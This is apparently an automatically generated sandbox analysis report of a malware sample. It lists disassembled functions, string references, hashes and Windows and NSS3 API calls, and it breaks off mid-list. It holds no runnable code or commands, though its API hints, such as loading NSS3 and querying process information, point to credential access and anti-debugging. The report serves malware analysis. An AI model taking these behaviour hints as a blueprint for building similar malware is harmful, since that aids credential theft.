String ID: 0Ol$POl$pOl$winUnlock$winUnlockReadLock
API String ID: 0-1784664014
Opcode ID: 52a0dd895b6ec6338c49e2413cbb23a809849237b02d99f6efca455074ee927c
Instruction ID: ae30865a2fd02c0d27993f32de3e10baa74d41413e58227d9d908cc506e53f00
Opcode Fuzzy Hash: 52a0dd895b6ec6338c49e2413cbb23a809849237b02d99f6efca455074ee927c
Instruction Fuzzy Hash: CB717D716082409BDB14DF28EC84AAABBF5FF89318F15C618F94997341E730ED858BD5

Function 6C49AD50 Relevance: 6.4, APIs: 4, Instructions: 389COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3157468448.000000006C361000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C360000, based on PE: true

Associated: 00000000.00000002.3157448680.000000006C360000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157602062.000000006C4FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157637379.000000006C53E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157659602.000000006C53F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157684733.000000006C540000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157720711.000000006C545000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c360000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b70b79f8ee21ece4e84fa9739b82e967b008a20b77bd409cdf3a077b064b3137
Instruction ID: cc0a0df7ff5b95b9d6a1fb94396cdf873982059a7754d79d835db04d8eed6873
Opcode Fuzzy Hash: b70b79f8ee21ece4e84fa9739b82e967b008a20b77bd409cdf3a077b064b3137
Instruction Fuzzy Hash: FBF10371F051258BDB24CF28CC44FAA7BF1AB8A309F168229C909D7754F7B49951CBD4

Function 6C374DB0 Relevance: 5.3, Strings: 4, Instructions: 318COMMON

Download Yara Rule

Strings

pOl, xrefs: 6C374E1C, 6C374E81, 6C374FDE, 6C375047, 6C3750BB, 6C3751A3, 6C37526C
0Ol, xrefs: 6C374EDE, 6C374F82
winUnlockReadLock, xrefs: 6C375125
POl, xrefs: 6C375019, 6C3750FA, 6C375157, 6C3751DE, 6C3751F2, 6C37520D, 6C375220, 6C3752A2, 6C3752B5

Memory Dump Source

Source File: 00000000.00000002.3157468448.000000006C361000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C360000, based on PE: true

Associated: 00000000.00000002.3157448680.000000006C360000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157602062.000000006C4FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157637379.000000006C53E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157659602.000000006C53F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157684733.000000006C540000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157720711.000000006C545000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c360000_file.jbxd

Similarity

API ID:
String ID: 0Ol$POl$pOl$winUnlockReadLock
API String ID: 0-2538839157
Opcode ID: a0920263021bc58d95952823f53dfcbf15aa8f9d2dd912bda83c0e0c2e4634b0
Instruction ID: 4f849d49bd62c7e3d8c93171b508c39a1c9e1f2bc9bdd2025b46f7a835d5a3fe
Opcode Fuzzy Hash: a0920263021bc58d95952823f53dfcbf15aa8f9d2dd912bda83c0e0c2e4634b0
Instruction Fuzzy Hash: 5AE13D70A083408FDB15DF28D88465ABBF0FF89318F12861DF89997351E774A985CF9A

Function 0062ACEC Relevance: 5.2, Strings: 4, Instructions: 178COMMON

Download Yara Rule

Strings

pd, xrefs: 0062AD7B
`qd, xrefs: 0062AE15
`pd, xrefs: 0062AD24
(qd, xrefs: 0062ADB6

Memory Dump Source

Source File: 00000000.00000002.3128903717.0000000000611000.00000080.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true

Associated: 00000000.00000002.3128864133.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129062872.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129102217.000000000064E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000674000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.000000000069D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006F6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3130011109.0000000000863000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_610000_file.jbxd

Yara matches

Similarity

API ID:
String ID: (qd$`pd$`qd$pd
API String ID: 0-2020926690
Opcode ID: c459935df523b1915ac6af82951a0c40dff86db3d3795227915fe0862be3348d
Instruction ID: 0c07fd84191ee648a5e9d442dce7133963f00224a8a15d652cefec05aa35fd3e
Opcode Fuzzy Hash: c459935df523b1915ac6af82951a0c40dff86db3d3795227915fe0862be3348d
Instruction Fuzzy Hash: EC51D6739046259BEB18CF98E4806E977A2EF84305F2654BDCC8AEF286EB705941CF51

Function 6C363D80 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 164COMMON

Download Yara Rule

APIs

htonl.WSOCK32(00000000), ref: 6C363EA9

Strings

0, xrefs: 6C363DAB

Memory Dump Source

Source File: 00000000.00000002.3157468448.000000006C361000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C360000, based on PE: true

Associated: 00000000.00000002.3157448680.000000006C360000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157602062.000000006C4FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157637379.000000006C53E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157659602.000000006C53F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157684733.000000006C540000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157720711.000000006C545000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c360000_file.jbxd

Similarity

API ID: htonl
String ID: 0
API String ID: 2009864989-4108050209
Opcode ID: c120913f21e173518fa06a718dcd8fdb2a8fa7d29a27ed99a9868c8a35bd3c97
Instruction ID: d0f82a036a4748f1b2b148440d8df6978acc0b1396e5215b1657389837e5d0f5
Opcode Fuzzy Hash: c120913f21e173518fa06a718dcd8fdb2a8fa7d29a27ed99a9868c8a35bd3c97
Instruction Fuzzy Hash: 13513B33E490798ADB95857E88603FFBBB19F43328F194329C5A167EC4D27545458BF0

Function 0062D8CB Relevance: 3.1, APIs: 2, Instructions: 63timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?,759183C0,00000000,?,?,?,?,?,?,?,?,0062DD86,?), ref: 0062D920
SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,0062DD86,?), ref: 0062D92E

Part of subcall function 0062D10C: FileTimeToSystemTime.KERNEL32(?,?,?,?,0062D9F3,?,?,?,?,?,?,?,?,?,?,0062DD96), ref: 0062D124

Part of subcall function 0062D0E8: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0062D105

Memory Dump Source

Source File: 00000000.00000002.3128903717.0000000000611000.00000080.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true

Associated: 00000000.00000002.3128864133.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129062872.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129102217.000000000064E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000674000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.000000000069D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006F6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3130011109.0000000000863000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_610000_file.jbxd

Yara matches

Similarity

API ID: Time$FileSystem$LocalUnothrow_t@std@@@__ehfuncinfo$??2@
String ID:
API String ID: 568878067-0
Opcode ID: 7c8ed47baf35b760e57b8cd8795095e41de2b2c80a765a743deca3061d2293d9
Instruction ID: 39172e0cf19c802fcb8d13df585e75bad062e9a331dcafd7185ea8bc3f9ec9d2
Opcode Fuzzy Hash: 7c8ed47baf35b760e57b8cd8795095e41de2b2c80a765a743deca3061d2293d9
Instruction Fuzzy Hash: EE21F8B19002199FDF44DF69D9816ED7BF5BF09300F1040BAE948EB216E7358945DFA0

Function 0061144B Relevance: 3.0, APIs: 2, Instructions: 22nativeCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000007,00000000,00000004,00000000), ref: 0061145D
NtQueryInformationProcess.NTDLL(00000000), ref: 00611464

Memory Dump Source

Source File: 00000000.00000002.3128903717.0000000000611000.00000080.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true

Associated: 00000000.00000002.3128864133.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129062872.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129102217.000000000064E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000674000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.000000000069D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006F6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3130011109.0000000000863000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_610000_file.jbxd

Yara matches

Similarity

API ID: Process$CurrentInformationQuery
String ID:
API String ID: 3953534283-0
Opcode ID: fbd8569b234ff19dbcd67691b93f75dbf99ccf2811ebcaed902bf35dda3a97d1
Instruction ID: f14a14f54f968abc8710dd674c56adc0131d1f2a8e30fb0d478d95e3a3ee5193
Opcode Fuzzy Hash: fbd8569b234ff19dbcd67691b93f75dbf99ccf2811ebcaed902bf35dda3a97d1
Instruction Fuzzy Hash: D8E01271651304F7EF109BA1DD06B9A73EDA701B49F144155E302E60C0DAB8DA40D665

Function 6C43ED70 Relevance: 1.7, APIs: 1, Instructions: 217memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaAlloc_Util.NSS3(00000000,0000003C), ref: 6C43EE3D

Memory Dump Source

Source File: 00000000.00000002.3157468448.000000006C361000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C360000, based on PE: true

Associated: 00000000.00000002.3157448680.000000006C360000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157602062.000000006C4FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157637379.000000006C53E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157659602.000000006C53F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157684733.000000006C540000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157720711.000000006C545000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c360000_file.jbxd

Similarity

API ID: Alloc_ArenaUtil
String ID:
API String ID: 2062749931-0
Opcode ID: b51203e4b2318080346e191dc444ed80196527117a86a943b733acd6992df4c0
Instruction ID: 309cdb4944caaf122bf09e2efca64c3fafeaa69ed89a0504569fa49cae126661
Opcode Fuzzy Hash: b51203e4b2318080346e191dc444ed80196527117a86a943b733acd6992df4c0
Instruction Fuzzy Hash: 8871B072A027158BD718CF5AC8C0FAAB7F2ABC8304F15962DD85A97B91D770ED01CB90

Function 0063CDD6 Relevance: 1.5, APIs: 1, Instructions: 15COMMON

Download Yara Rule

APIs

EnumSystemLocalesA.KERNEL32(Function_0002CA41,00000001), ref: 0063CDEF

Memory Dump Source

Source File: 00000000.00000002.3128903717.0000000000611000.00000080.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true

Associated: 00000000.00000002.3128864133.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129062872.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129102217.000000000064E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000674000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.000000000069D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006F6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3130011109.0000000000863000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_610000_file.jbxd

Yara matches

Similarity

API ID: EnumLocalesSystem
String ID:
API String ID: 2099609381-0
Opcode ID: 725e1ca43d15aca08276120c77cad6bc88f56b107baabad4716546e781f150c6
Instruction ID: cf8cd49773a92ec35312d920a71a2d15b04f80bbc1861dbabfb942674a364d6c
Opcode Fuzzy Hash: 725e1ca43d15aca08276120c77cad6bc88f56b107baabad4716546e781f150c6
Instruction Fuzzy Hash: D3D05E719507004BD7208F359D497E177E1FB11B26F209949EE92591C1D6B464858740

Function 00638EAE Relevance: 1.5, APIs: 1, Instructions: 4COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_00028E6C), ref: 00638EB3

Memory Dump Source

Source File: 00000000.00000002.3128903717.0000000000611000.00000080.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true

Associated: 00000000.00000002.3128864133.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129062872.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129102217.000000000064E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000674000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.000000000069D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006F6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3130011109.0000000000863000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_610000_file.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 3eba233f9a2e68d8dc7da264861a9132e8c50cd001319de6725ece7892dbd5a4
Instruction ID: 4dc2bde617072f4479fcdad15ec9ddb7a8b93dfae7332ab25967b0af2668af6b
Opcode Fuzzy Hash: 3eba233f9a2e68d8dc7da264861a9132e8c50cd001319de6725ece7892dbd5a4
Instruction Fuzzy Hash: 7C9002686512104E47002B70DD0958525925B5A602BC21551B211CA554DF5050405551

Function 6C4ADCD0 Relevance: .4, Instructions: 371COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3157468448.000000006C361000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C360000, based on PE: true

Associated: 00000000.00000002.3157448680.000000006C360000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157602062.000000006C4FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157637379.000000006C53E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157659602.000000006C53F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157684733.000000006C540000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157720711.000000006C545000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c360000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0713317846c00082743a404ecf0b700b8834933652291fa0a665e8aee278f31d
Instruction ID: 2c2107b894ec3fc793fff445f7eecc508832fadba354381c30f9d0c10cfcf20e
Opcode Fuzzy Hash: 0713317846c00082743a404ecf0b700b8834933652291fa0a665e8aee278f31d
Instruction Fuzzy Hash: F6F14771A012158FDB08CF59C880FAA77B2BF99318F298068EC199B745DB35EC53CB91

Function 0063F59B Relevance: .4, Instructions: 355COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3128903717.0000000000611000.00000080.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true

Associated: 00000000.00000002.3128864133.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129062872.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129102217.000000000064E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000674000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.000000000069D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006F6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3130011109.0000000000863000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_610000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f02dcea883d10451d84a59732baab65edb0b568fbd8ca007beb23fa60eef1400
Instruction ID: a4a507246b0e8294bd3a2514c86e2a606689d318213e26176609708f3d1bbc9f
Opcode Fuzzy Hash: f02dcea883d10451d84a59732baab65edb0b568fbd8ca007beb23fa60eef1400
Instruction Fuzzy Hash: 34C17F73D0E5B2458B36462D481827BFEA36E91B41B1FC3A5DCD03F389C627AD1696E0

Function 0063F1B3 Relevance: .3, Instructions: 349COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3128903717.0000000000611000.00000080.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true

Associated: 00000000.00000002.3128864133.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129062872.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129102217.000000000064E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000674000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.000000000069D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006F6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3130011109.0000000000863000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_610000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0c69e47d847606dd43a020a10b245ffd8c98205713db3c8f796c6159738d0b06
Instruction ID: 93ae122d93d69b7f3aacd384bc54cd8c9103f7c567c421ea7f4f2d0f49aa4480
Opcode Fuzzy Hash: 0c69e47d847606dd43a020a10b245ffd8c98205713db3c8f796c6159738d0b06
Instruction Fuzzy Hash: A2C17173D0A5B2458B35462D485827FFEA36E91B41B1FC3A5DCD03F38AC2276D1696E0

Function 6C441DC0 Relevance: .3, Instructions: 345COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3157468448.000000006C361000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C360000, based on PE: true

Associated: 00000000.00000002.3157448680.000000006C360000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157602062.000000006C4FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157637379.000000006C53E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157659602.000000006C53F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157684733.000000006C540000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157720711.000000006C545000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c360000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5cf8dc963f7f79db549299581b4ae9ef430c02c880e9910e3ec163e0518b33a5
Instruction ID: 6701d6abea3953fbb3afa5c4c2c91201d3ce3916ea902240102be7145206b5e9
Opcode Fuzzy Hash: 5cf8dc963f7f79db549299581b4ae9ef430c02c880e9910e3ec163e0518b33a5
Instruction Fuzzy Hash: F8D159729046168BFB11CE18C884FDA7763EB85329F3D8328C9645B7C6C7769916C3D0

Function 0063EDE1 Relevance: .3, Instructions: 332COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3128903717.0000000000611000.00000080.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true

Associated: 00000000.00000002.3128864133.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129062872.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129102217.000000000064E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000674000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.000000000069D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006F6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3130011109.0000000000863000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_610000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 21018234ac6c65dce347e9eb3c09d9e563dc327998c84d170fb29f747537f1fa
Instruction ID: ae73549c5ed8b16c693a35e242b61655c1bec1a3d7c976882b2142b6add46c4c
Opcode Fuzzy Hash: 21018234ac6c65dce347e9eb3c09d9e563dc327998c84d170fb29f747537f1fa
Instruction Fuzzy Hash: 69C16F73E1A5B2498B36462D481827BEEA36E91B41B1FC3A5DCD03F3C9C6276D0695F0

Function 0063EA43 Relevance: .3, Instructions: 326COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3128903717.0000000000611000.00000080.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true

Associated: 00000000.00000002.3128864133.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129062872.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129102217.000000000064E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000674000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.000000000069D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006F6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3130011109.0000000000863000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_610000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 21b74c51e355f1ada917146b454bba93dbff062365e48e41ecc74cc68dac6f4d
Instruction ID: 36b1edab75952dc520fd96f743cd42dd92fc1820ab61afb7cdbad01f84460e01
Opcode Fuzzy Hash: 21b74c51e355f1ada917146b454bba93dbff062365e48e41ecc74cc68dac6f4d
Instruction Fuzzy Hash: B3B16F73E0A5B2458B36462D09582BFEEA36E91B4071EC3A5DCD03F3C9C623AD0695F0

Function 0062CEF4 Relevance: .1, Instructions: 74COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3128903717.0000000000611000.00000080.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true

Associated: 00000000.00000002.3128864133.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129062872.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129102217.000000000064E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000674000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.000000000069D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B2000.00000004.00000001.01000000.00000003.sdmpDownload File
